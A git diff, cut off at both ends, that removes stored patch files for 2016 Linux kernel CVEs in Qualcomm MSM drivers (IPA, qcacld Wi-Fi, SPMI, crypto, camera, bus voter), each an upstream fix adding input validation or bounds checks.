-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_add_hdr_proc_ctx(
- 			(struct ipa_ioc_add_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
-@@ -1331,10 +1501,11 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		pre_entry =
-+			((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls;
- 		pyld_sz =
- 		   sizeof(struct ipa_ioc_del_hdr_proc_ctx) +
--		   ((struct ipa_ioc_del_hdr_proc_ctx *)header)->num_hdls *
--		   sizeof(struct ipa_hdr_proc_ctx_del);
-+		   pre_entry * sizeof(struct ipa_hdr_proc_ctx_del);
- 		param = kzalloc(pyld_sz, GFP_KERNEL);
- 		if (!param) {
- 			retval = -ENOMEM;
-@@ -1344,6 +1515,16 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
-+		/* add check in case user-space module compromised */
-+		if (unlikely(((struct ipa_ioc_del_hdr_proc_ctx *)
-+			param)->num_hdls != pre_entry)) {
-+			IPAERR(" prevent memory corruption(%d not match %d)\n",
-+				((struct ipa_ioc_del_hdr_proc_ctx *)param)->
-+				num_hdls,
-+				pre_entry);
-+			retval = -EINVAL;
-+			break;
-+		}
- 		if (ipa3_del_hdr_proc_ctx(
- 			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
- 			retval = -EFAULT;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch
deleted file mode 100644
index 1a6f475f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3868/ANY/0001.patch
+++ /dev/null
@@ -1,74 +0,0 @@
-From 17014696ce3836c91215b6d6dd82f3befd6e7d4d Mon Sep 17 00:00:00 2001
-From: Archana Sathyakumar <asathyak@codeaurora.org>
-Date: Wed, 29 Jun 2016 11:47:47 -0600
-Subject: msm-core: debug: Fix the number of arguments for sysfs nodes
-
-Ptable and enable node parses the input arguments incorrectly. Parse the
-input message into exact number of arguments that are required for the
-respective nodes.
-
-CRs-fixed: 1032875
-Change-Id: I881f18217b703a497efa4799288dee39a28ea8ab
-Signed-off-by: Archana Sathyakumar <asathyak@codeaurora.org>
----
- drivers/power/qcom/debug_core.c | 14 +++++++++-----
- 1 file changed, 9 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/power/qcom/debug_core.c b/drivers/power/qcom/debug_core.c
-index d3620bb..e9c578f 100644
---- a/drivers/power/qcom/debug_core.c
-+++ b/drivers/power/qcom/debug_core.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -22,6 +22,8 @@
- #include "soc/qcom/msm-core.h"
- 
- #define MAX_PSTATES 50
-+#define NUM_OF_PENTRY 3 /* number of variables for ptable node */
-+#define NUM_OF_EENTRY 2 /* number of variables for enable node */
- 
- enum arg_offset {
- 	CPU_OFFSET,
-@@ -131,13 +133,15 @@ static void add_to_ptable(uint64_t *arg)
- 		node->ptr->len = node->len;
- }
- 
--static int split_ptable_args(char *line, uint64_t *arg)
-+static int split_ptable_args(char *line, uint64_t *arg, uint32_t n)
- {
- 	char *args;
- 	int i;
- 	int ret = 0;
- 
--	for (i = 0; line; i++) {
-+	for (i = 0; i < n; i++) {
-+		if (!line)
-+			break;
- 		args = strsep(&line, " ");
- 		ret = kstrtoull(args, 10, &arg[i]);
- 	}
-@@ -163,7 +167,7 @@ static ssize_t msm_core_ptable_write(struct file *file,
- 		goto done;
- 	}
- 	kbuf[len] = '\0';
--	ret = split_ptable_args(kbuf, arg);
-+	ret = split_ptable_args(kbuf, arg, NUM_OF_PENTRY);
- 	if (!ret) {
- 		add_to_ptable(arg);
- 		ret = len;
-@@ -227,7 +231,7 @@ static ssize_t msm_core_enable_write(struct file *file,
- 		goto done;
- 	}
- 	kbuf[len] = '\0';
--	ret = split_ptable_args(kbuf, arg);
-+	ret = split_ptable_args(kbuf, arg, NUM_OF_EENTRY);
- 	if (ret)
- 		goto done;
- 	cpu = arg[CPU_OFFSET];
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch
deleted file mode 100644
index dd8e504c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From 50e8f265b3f7926aeb4e49c33f7301ace89faa77 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Mon, 30 May 2016 20:06:19 +0530
-Subject: qcacld-2.0: Fix buffer over read in iwpriv WE_UNIT_TEST_CMD command
-
-In current driver, WE_UNIT_TEST_CMD has below problems.
-- apps_arg[1] can have negative value and can lead to
-  buffer overead.
-- apps_arg[] can be dereferenced beyond the allocated length.
-
-Change the code to handle the number of args if user has
-given negative value. Also avoid dereferencing the
-apps_arg[] beyond the allocated length.
-
-CRs-Fixed: 997797
-Change-Id: Id26ebc32324b800ccdbecbd03f23861b5bde2aaf
----
- CORE/HDD/src/wlan_hdd_wext.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index d6cf499..e49ea8e 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9106,7 +9106,8 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
-                     hddLog(LOGE, FL("Invalid MODULE ID %d"), apps_args[0]);
-                     return -EINVAL;
-                 }
--                if (apps_args[1] > (WMA_MAX_NUM_ARGS)) {
-+                if ((apps_args[1] > (WMA_MAX_NUM_ARGS)) ||
-+                    (apps_args[1] < 0)) {
-                     hddLog(LOGE, FL("Too Many args %d"), apps_args[1]);
-                     return -EINVAL;
-                 }
-@@ -9119,7 +9120,8 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
-                 unitTestArgs->vdev_id            = (int)pAdapter->sessionId;
-                 unitTestArgs->module_id          = apps_args[0];
-                 unitTestArgs->num_args           = apps_args[1];
--                for (i = 0, j = 2; i < unitTestArgs->num_args; i++, j++) {
-+                for (i = 0, j = 2; i < unitTestArgs->num_args - 1;
-+                     i++, j++) {
-                     unitTestArgs->args[i] = apps_args[j];
-                 }
-                 msg.type = SIR_HAL_UNIT_TEST_CMD;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch b/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch
deleted file mode 100644
index 2c2c44ef..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3874/qcacld-2.0/0002.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From a3974e61c960aadcc147c3c5704a67309171642d Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Thu, 16 Jun 2016 13:20:35 +0530
-Subject: qcacld-2.0: Fix buffer over read in iwpriv WE_UNIT_TEST_CMD command
-
-In current driver, WE_UNIT_TEST_CMD has below problem.
-- apps_arg[1] can have zero value and can lead to
-  buffer overead
-
-Change the code to handle the number of args if user has
-given zero.
-
-CRs-Fixed: 1029540
-Change-Id: Idc8e1d77d9623daeb98d0c4b7ad8a8d6cfa9c2d2
----
- CORE/HDD/src/wlan_hdd_wext.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_wext.c b/CORE/HDD/src/wlan_hdd_wext.c
-index fd738da..33d4dfd 100644
---- a/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/CORE/HDD/src/wlan_hdd_wext.c
-@@ -9072,7 +9072,7 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
-                 }
-                 if ((apps_args[1] > (WMA_MAX_NUM_ARGS)) ||
-                     (apps_args[1] < 0)) {
--                    hddLog(LOGE, FL("Too Many args %d"), apps_args[1]);
-+                    hddLog(LOGE, FL("Too Many/Few args %d"), apps_args[1]);
-                     return -EINVAL;
-                 }
-                 unitTestArgs = vos_mem_malloc(sizeof(*unitTestArgs));
-@@ -9084,8 +9084,7 @@ static int __iw_set_var_ints_getnone(struct net_device *dev,
-                 unitTestArgs->vdev_id            = (int)pAdapter->sessionId;
-                 unitTestArgs->module_id          = apps_args[0];
-                 unitTestArgs->num_args           = apps_args[1];
--                for (i = 0, j = 2; i < unitTestArgs->num_args - 1;
--                     i++, j++) {
-+                for (i = 0, j = 2; i < unitTestArgs->num_args; i++, j++) {
-                     unitTestArgs->args[i] = apps_args[j];
-                 }
-                 msg.type = SIR_HAL_UNIT_TEST_CMD;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch
deleted file mode 100644
index 349c36d0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3892/ANY/0001.patch
+++ /dev/null
@@ -1,105 +0,0 @@
-From dd40cc2bd210dd7a4dd649e8f79add2bbeda2bd5 Mon Sep 17 00:00:00 2001
-From: Abhijeet Dharmapurikar <adharmap@codeaurora.org>
-Date: Wed, 15 Jun 2016 09:46:21 -0700
-Subject: spmi: prevent showing the address of spmidev
-
-Creating devices with the address of the container spmidev is not
-indicative of the actual hardware device it represents.
-
-Instead use an unique id to indicate the device it represents.
-
-CRs-Fixed: 1024197
-Change-Id: Id18e2a19f4fa1249901a3f275defa8f589270d69
-Signed-off-by: Abhijeet Dharmapurikar <adharmap@codeaurora.org>
----
- drivers/spmi/spmi.c  | 18 +++++++++++++++---
- include/linux/spmi.h |  6 +++++-
- 2 files changed, 20 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/spmi/spmi.c b/drivers/spmi/spmi.c
-index f5e49c8..1a1bae9 100644
---- a/drivers/spmi/spmi.c
-+++ b/drivers/spmi/spmi.c
-@@ -32,6 +32,7 @@ struct spmii_boardinfo {
- static DEFINE_MUTEX(board_lock);
- static LIST_HEAD(board_list);
- static DEFINE_IDR(ctrl_idr);
-+static DEFINE_IDA(spmi_devid_ida);
- static struct device_type spmi_dev_type;
- static struct device_type spmi_ctrl_type;
- 
-@@ -229,22 +230,32 @@ int spmi_add_device(struct spmi_device *spmidev)
- {
- 	int rc;
- 	struct device *dev = get_valid_device(spmidev);
-+	int id;
- 
- 	if (!dev) {
- 		pr_err("invalid SPMI device\n");
- 		return -EINVAL;
- 	}
- 
-+	id = ida_simple_get(&spmi_devid_ida, 0, 0, GFP_KERNEL);
-+	if (id < 0) {
-+		pr_err("No id available status = %d\n", id);
-+		return id;
-+	}
-+
- 	/* Set the device name */
--	dev_set_name(dev, "%s-%p", spmidev->name, spmidev);
-+	spmidev->id = id;
-+	dev_set_name(dev, "%s-%d", spmidev->name, spmidev->id);
- 
- 	/* Device may be bound to an active driver when this returns */
- 	rc = device_add(dev);
- 
--	if (rc < 0)
-+	if (rc < 0) {
-+		ida_simple_remove(&spmi_devid_ida, spmidev->id);
- 		dev_err(dev, "Can't add %s, status %d\n", dev_name(dev), rc);
--	else
-+	} else {
- 		dev_dbg(dev, "device %s registered\n", dev_name(dev));
-+	}
- 
- 	return rc;
- }
-@@ -292,6 +303,7 @@ EXPORT_SYMBOL_GPL(spmi_new_device);
- void spmi_remove_device(struct spmi_device *spmi_dev)
- {
- 	device_unregister(&spmi_dev->dev);
-+	ida_simple_remove(&spmi_devid_ida, spmi_dev->id);
- }
- EXPORT_SYMBOL_GPL(spmi_remove_device);
- 
-diff --git a/include/linux/spmi.h b/include/linux/spmi.h
-index b581de8..5a8525d 100644
---- a/include/linux/spmi.h
-+++ b/include/linux/spmi.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014 The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -120,6 +120,9 @@ struct spmi_resource {
-  *  @dev_node: array of SPMI resources when used with spmi-dev-container.
-  *  @num_dev_node: number of device_node structures.
-  *  @sid: Slave Identifier.
-+ *  @id: Unique identifier to differentiate from other spmi devices with
-+ *       possibly same name.
-+ *
-  */
- struct spmi_device {
- 	struct device		dev;
-@@ -129,6 +132,7 @@ struct spmi_device {
- 	struct spmi_resource	*dev_node;
- 	u32			num_dev_node;
- 	u8			sid;
-+	int			id;
- };
- #define to_spmi_device(d) container_of(d, struct spmi_device, dev)
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch
deleted file mode 100644
index 6e74ecb2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3893/ANY/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From a7a6ddc91cce7ad5ad55c9709b24bfc80f5ac873 Mon Sep 17 00:00:00 2001
-From: Patrick Daly <pdaly@codeaurora.org>
-Date: Thu, 28 May 2015 18:32:49 -0700
-Subject: ASoC: wcd9xxx: Fix unprotected userspace access
-
-Protect against memory faults while accessing userspace addresses.
-
-Change-Id: I1433bac73d24d428749558e530e6869c2e5ee98f
-Signed-off-by: Patrick Daly <pdaly@codeaurora.org>
----
- sound/soc/codecs/wcdcal-hwdep.c | 5 +++--
- 1 file changed, 3 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/codecs/wcdcal-hwdep.c b/sound/soc/codecs/wcdcal-hwdep.c
-index 5013bee..954620a 100644
---- a/sound/soc/codecs/wcdcal-hwdep.c
-+++ b/sound/soc/codecs/wcdcal-hwdep.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -82,7 +82,8 @@ static int wcdcal_hwdep_ioctl_shared(struct snd_hwdep *hw,
- 		return -EFAULT;
- 	}
- 	data = fw[fw_user.cal_type]->data;
--	memcpy(data, fw_user.buffer, fw_user.size);
-+	if (copy_from_user(data, fw_user.buffer, fw_user.size))
-+		return -EFAULT;
- 	fw[fw_user.cal_type]->size = fw_user.size;
- 	mutex_lock(&fw_data->lock);
- 	set_bit(WCDCAL_RECIEVED, &fw_data->wcdcal_state[fw_user.cal_type]);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch
deleted file mode 100644
index 3c220f50..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3894/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From de3e3e5930b1edfebec7870390443279ec5b65fe Mon Sep 17 00:00:00 2001
-From: Srinivasarao P <spathi@codeaurora.org>
-Date: Fri, 22 Jul 2016 12:48:33 +0530
-Subject: msm : dma_test: Initialize newly allocated memory
-
-The MSM_DMA_IOALLOC ioctl command allocates kernel memory and
-this memory can be read back using the MSM_DMA_IORBUF ioctl command.
-This memory is not zero-initialized and may contain sensitive data.
-
-Change-Id: I8c55d6fe500e7607690b89806715893783eecf9c
-Signed-off-by: Srinivasarao P <spathi@codeaurora.org>
----
- arch/arm/mach-msm/dma_test.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/arch/arm/mach-msm/dma_test.c b/arch/arm/mach-msm/dma_test.c
-index 3d13e4e..1d717c3 100644
---- a/arch/arm/mach-msm/dma_test.c
-+++ b/arch/arm/mach-msm/dma_test.c
-@@ -99,7 +99,7 @@ static int buffer_req(struct msm_dma_alloc_req *req)
- 	if (i >= MAX_TEST_BUFFERS)
- 		goto error;
- 
--	buffers[i] = kmalloc(req->size, GFP_KERNEL | __GFP_DMA);
-+	buffers[i] = kzalloc(req->size, GFP_KERNEL | __GFP_DMA);
- 	if (buffers[i] == 0)
- 		goto error;
- 	sizes[i] = req->size;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch
deleted file mode 100644
index 4b807753..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3901/ANY/0001.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From 5f69ccf3b011c1d14a1b1b00dbaacf74307c9132 Mon Sep 17 00:00:00 2001
-From: Zhen Kong <zkong@codeaurora.org>
-Date: Fri, 29 Jul 2016 15:32:31 -0700
-Subject: msm: crypto: Fix integer over flow check in qcedev driver
-
-Integer overflow check always fails when ULONG_MAX is used,
-as ULONG_MAX is 2^64-1, while req->data[i].len and total
-are uint32_t. Make change to use U32_MAX instead of
-ULONG_MAX.
-
-CRs-fixed: 1046507
-Change-Id: Iccf9c32400ecc7ffc0afae16f58c38e5d78a5b64
-Signed-off-by: Zhen Kong <zkong@codeaurora.org>
----
- drivers/crypto/msm/qcedev.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c
-index 51f5069..e63f061 100644
---- a/drivers/crypto/msm/qcedev.c
-+++ b/drivers/crypto/msm/qcedev.c
-@@ -1,6 +1,6 @@
- /* Qualcomm CE device driver.
-  *
-- * Copyright (c) 2010-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1543,7 +1543,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 	}
- 	/* Check for sum of all dst length is equal to data_len  */
- 	for (i = 0; i < req->entries; i++) {
--		if (req->vbuf.dst[i].len >= ULONG_MAX - total) {
-+		if (req->vbuf.dst[i].len >= U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req dst vbuf length\n",
- 				__func__);
- 			goto error;
-@@ -1557,7 +1557,7 @@ static int qcedev_check_cipher_params(struct qcedev_cipher_op_req *req,
- 	}
- 	/* Check for sum of all src length is equal to data_len  */
- 	for (i = 0, total = 0; i < req->entries; i++) {
--		if (req->vbuf.src[i].len > ULONG_MAX - total) {
-+		if (req->vbuf.src[i].len > U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req src vbuf length\n",
- 				__func__);
- 			goto error;
-@@ -1619,7 +1619,7 @@ static int qcedev_check_sha_params(struct qcedev_sha_op_req *req,
- 
- 	/* Check for sum of all src length is equal to data_len  */
- 	for (i = 0, total = 0; i < req->entries; i++) {
--		if (req->data[i].len > ULONG_MAX - total) {
-+		if (req->data[i].len > U32_MAX - total) {
- 			pr_err("%s: Integer overflow on total req buf length\n",
- 				__func__);
- 			goto sha_error;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch
deleted file mode 100644
index 66c6ddff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3902/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 2fca425d781572393fbe51abe2e27a932d24a768 Mon Sep 17 00:00:00 2001
-From: Skylar Chang <chiaweic@codeaurora.org>
-Date: Fri, 22 Jul 2016 15:03:16 -0700
-Subject: msm: ipa: handle information leak on ADD_FLT_RULE_INDEX ioctl
-
-IPA might have Information leak and device crash due to
-kernel heap overread in IPA driver when processing
-WAN_IOC_ADD_FLT_RULE_INDEX ioctl. The fix is to add
-check on max number of filter rules send to modem.
-
-Change-Id: I454e04d05cfcb7af8fc4bd2b4a1bade55c4684d0
-Signed-off-by: Skylar Chang <chiaweic@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_qmi_service.c | 7 ++++++-
- 1 file changed, 6 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_qmi_service.c b/drivers/platform/msm/ipa/ipa_qmi_service.c
-index d68350a..58d7c181 100644
---- a/drivers/platform/msm/ipa/ipa_qmi_service.c
-+++ b/drivers/platform/msm/ipa/ipa_qmi_service.c
-@@ -491,7 +491,7 @@ int qmi_filter_request_send(struct ipa_install_fltr_rule_req_msg_v01 *req)
- 	if (req->filter_spec_list_len == 0) {
- 		IPAWANDBG("IPACM pass zero rules to Q6\n");
- 	} else {
--		IPAWANDBG("IPACM pass %d rules to Q6\n",
-+		IPAWANDBG("IPACM pass %u rules to Q6\n",
- 		req->filter_spec_list_len);
- 	}
- 
-@@ -622,6 +622,11 @@ int qmi_filter_notify_send(struct ipa_fltr_installed_notif_req_msg_v01 *req)
- 		IPAWANERR(" delete UL filter rule for pipe %d\n",
- 		req->source_pipe_index);
- 		return -EINVAL;
-+	} else if (req->filter_index_list_len > QMI_IPA_MAX_FILTERS_V01) {
-+		IPAWANERR(" UL filter rule for pipe %d exceed max (%u)\n",
-+		req->source_pipe_index,
-+		req->filter_index_list_len);
-+		return -EINVAL;
- 	} else if (req->filter_index_list[0].filter_index == 0 &&
- 		req->source_pipe_index !=
- 		ipa_get_ep_mapping(IPA_CLIENT_APPS_LAN_WAN_PROD)) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch
deleted file mode 100644
index 2b2badff..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3903/ANY/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From b8874573428e8ce024f57c6242d662fcca5e5d55 Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M <vtmuni@codeaurora.org>
-Date: Mon, 25 Jul 2016 11:53:19 +0530
-Subject: msm: camera: sensor: Fix use after free condition
-
-Add a check to return value before calling csid config which will
-otherwise lead to use after free scenario.
-
-CRs-Fixed: 1040857
-Change-Id: I4f4d9e38eeb537875e0d01de0e99913a44dd3f3f
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c | 10 +++++++---
- 1 file changed, 7 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-index 5864096..7dd2959 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/csid/msm_csid.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -518,7 +518,7 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg)
- 			break;
- 		}
- 		if (csid_params.lut_params.num_cid < 1 ||
--			csid_params.lut_params.num_cid > 16) {
-+			csid_params.lut_params.num_cid > MAX_CID) {
- 			pr_err("%s: %d num_cid outside range\n",
- 				 __func__, __LINE__);
- 			rc = -EINVAL;
-@@ -547,6 +547,10 @@ static int32_t msm_csid_cmd(struct csid_device *csid_dev, void __user *arg)
- 			csid_params.lut_params.vc_cfg[i] = vc_cfg;
- 		}
- 		csid_dev->csid_sof_debug = 0;
-+		if (rc < 0) {
-+			pr_err("%s:%d failed\n", __func__, __LINE__);
-+			break;
-+		}
- 		rc = msm_csid_config(csid_dev, &csid_params);
- 		for (i--; i >= 0; i--)
- 			kfree(csid_params.lut_params.vc_cfg[i]);
-@@ -658,7 +662,7 @@ static int32_t msm_csid_cmd32(struct csid_device *csid_dev, void __user *arg)
- 		csid_params.lut_params.num_cid = lut_par32.num_cid;
- 
- 		if (csid_params.lut_params.num_cid < 1 ||
--			csid_params.lut_params.num_cid > 16) {
-+			csid_params.lut_params.num_cid > MAX_CID) {
- 			pr_err("%s: %d num_cid outside range\n",
- 				 __func__, __LINE__);
- 			rc = -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch
deleted file mode 100644
index 78d2a26b..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3904/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From 069683407ca9a820d05c914b57c587bcd3f16a3a Mon Sep 17 00:00:00 2001
-From: David Dai <daidavid1@codeaurora.org>
-Date: Fri, 5 Aug 2016 15:14:25 -0700
-Subject: msm: msm_bus: limit max chars read by sscanf
-
-Current bus_floor_vote_store_api does not limit/check
-the size of the string in input, allowing stack overflow.
-Specify the max number of characters read allowable to
-the size of destination buffer.
-
-CRs-Fixed: 1050455
-Change-Id: Ia9227480be6ea4f3ade71f5675f95a3efd9fcf99
-Signed-off-by: David Dai <daidavid1@codeaurora.org>
----
- drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c b/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-index e4c8f1f..a876484 100644
---- a/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-+++ b/drivers/platform/msm/msm_bus/msm_bus_dbg_voter.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is Mree software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -133,7 +133,7 @@ static ssize_t bus_floor_vote_store_api(struct device *dev,
- 		return 0;
- 	}
- 
--	if (sscanf(buf, "%s %llu", name, &vote_khz) != 2) {
-+	if (sscanf(buf, "%9s %llu", name, &vote_khz) != 2) {
- 		pr_err("%s:return error", __func__);
- 		return -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch
deleted file mode 100644
index adb60fd8..00000000
--- a/Patches/Linux_CVEs/CVE-2016-3905/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,170 +0,0 @@
-From b5112838eb91b71eded4b5ee37338535784e0aef Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@qca.qualcomm.com>
-Date: Sun, 10 Apr 2016 00:03:18 -0700
-Subject: qcacld-2.0: Add input validation for SENDACTIONFRAME
-
-Add input validation for SENDACTIONFRAME driver command.
-
-Change-Id: I3d1bf424e5e0f9a3b6f4662dd12a3a7314c7eace
-CRs-Fixed: 1001449
----
- CORE/HDD/src/wlan_hdd_main.c | 97 +++++++++++++++++++++++++++-----------------
- 1 file changed, 59 insertions(+), 38 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index a647bb5..8b7a441 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -2205,16 +2205,15 @@ hdd_parse_send_action_frame_v1_data(const tANI_U8 *pValue,
- static int
- hdd_sendactionframe(hdd_adapter_t *pAdapter, const tANI_U8 *bssid,
-                     const tANI_U8 channel, const tANI_U8 dwell_time,
--                    const tANI_U8 payload_len, const tANI_U8 *payload)
-+                    const int payload_len, const tANI_U8 *payload)
- {
-    struct ieee80211_channel chan;
--   tANI_U8 frame_len;
-+   int frame_len, ret = 0;
-    tANI_U8 *frame;
-    struct ieee80211_hdr_3addr *hdr;
-    u64 cookie;
-    hdd_station_ctx_t *pHddStaCtx;
-    hdd_context_t *pHddCtx;
--   int ret = 0;
-    tpSirMacVendorSpecificFrameHdr pVendorSpecific =
-                    (tpSirMacVendorSpecificFrameHdr) payload;
- #if (LINUX_VERSION_CODE >= KERNEL_VERSION(3,14,0)) || defined(WITH_BACKPORTS)
-@@ -2371,45 +2370,57 @@ hdd_parse_sendactionframe_v1(hdd_adapter_t *pAdapter, const char *command)
-    return ret;
- }
- 
--/*
--  \brief hdd_parse_sendactionframe_v2() - parse version 2 of the
--         SENDACTIONFRAME command
--
--  This function parses the v2 SENDACTIONFRAME command with the format
-+/**
-+ * hdd_parse_sendactionframe_v2() - parse version 2 of the
-+ *                                  SENDACTIONFRAME command
-+ * @pAdapter: Adapter upon which the command was received
-+ * @command: command that was received, ASCII command followed
-+ *           by binary data
-+ * @total_len: total length of command
-+ *
-+ * This function parses the v2 SENDACTIONFRAME command with the format
-+ * SENDACTIONFRAME <android_wifi_af_params>
-+ *
-+ * Return: 0 for success non-zero for failure
-+ */
-+static int
-+hdd_parse_sendactionframe_v2(hdd_adapter_t *pAdapter,
-+                             const char *command, int total_len)
-+{
-+	struct android_wifi_af_params *params;
-+	tSirMacAddr bssid;
-+	int ret;
- 
--      SENDACTIONFRAME <android_wifi_af_params>
-+	/* The params are located after "SENDACTIONFRAME " */
-+	total_len -= 16;
-+	params = (struct android_wifi_af_params *)(command + 16);
- 
